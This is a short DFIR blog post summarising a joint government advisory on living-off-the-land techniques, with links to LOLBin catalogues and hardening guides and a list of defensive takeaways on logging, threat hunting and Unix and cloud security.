A joint advisory sourced from MANY different agencies covers off common living off the land techniques and common gaps in cyber defense capabilities.
As put in this joint advisory: Living off the Land involves the abuse of native tools and processes on systems, especially living off the land binaries, often referred to as LOLBins, to blend in with normal system activities and operate discreetly with a lower likelihood of being detected or blocked because these tools are already deployed and trusted in the environment.
To simplify; LOLBins are administrative tooling, typically used by your IT admins and staff, that are abused by threat actors for nefarious purposes.
Resources for Living-off-the-land binaries (LOLBins) across different Operating Systems can be found here:
- LOLBAS project’s GitHub repository: https://lolbas-project.github.io/#
- Unix LOLBins: https://gtfobins.github.io/
- macOS LOLBins: https://www.loobins.io/
- Windows LOLBins:https://www.loldrivers.io/
A MUST READ for defenders and network administrators to defend against these advanced techniques that aren’t typically detected and prevented by security applications and monitoring tools. Some key takeaways from my read so far (I’m still reviewing) include;
- Implement comprehensive logging and aggregate logs in a centralised location that is tamper proof.
- Adversaries are known not only to conduct anti-forensics but also modify logs if kept insecure.
- Threat hunt these logs!
- Have IT collaborate with Security teams to understand typical workflows so that authentic LOLBins activity can be distinguished from a potential intrusion event.
- Do not underestimate the security gaps in Unix systems (Linux and macOS). The joint adversary provides examples of abuse of LOLBins on Unix systems by PRC and Russian state-sponsored actors.
- Guidance on macOS hardening: https://www.ncsc.gov.uk/collection/device-security-guidance/platform-guides/macos & https://github.com/usnistgov/macos_security
- Guidance on Linux hardening: SELinux – https://www.redhat.com/en/topics/linux/what-is-selinux & https://github.blog/2023-07-05-introduction-to-selinux/ & https://www.cisecurity.org/benchmark/red_hat_linux
- Cloud security is just as important as on-premise. Lateral movement from cloud to on-premise is on the rise.
- Secure you Microsoft 365 and Google Workspace environments: https://www.cisa.gov/resources-tools/services/secure-cloud-business-applications-scuba-project
This advisory is based on a previous joint advisory published by CISA on a PRC adversary utilising LOTL techniques: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a
NPD4n6: Nicks DFIR blog 
Leave a comment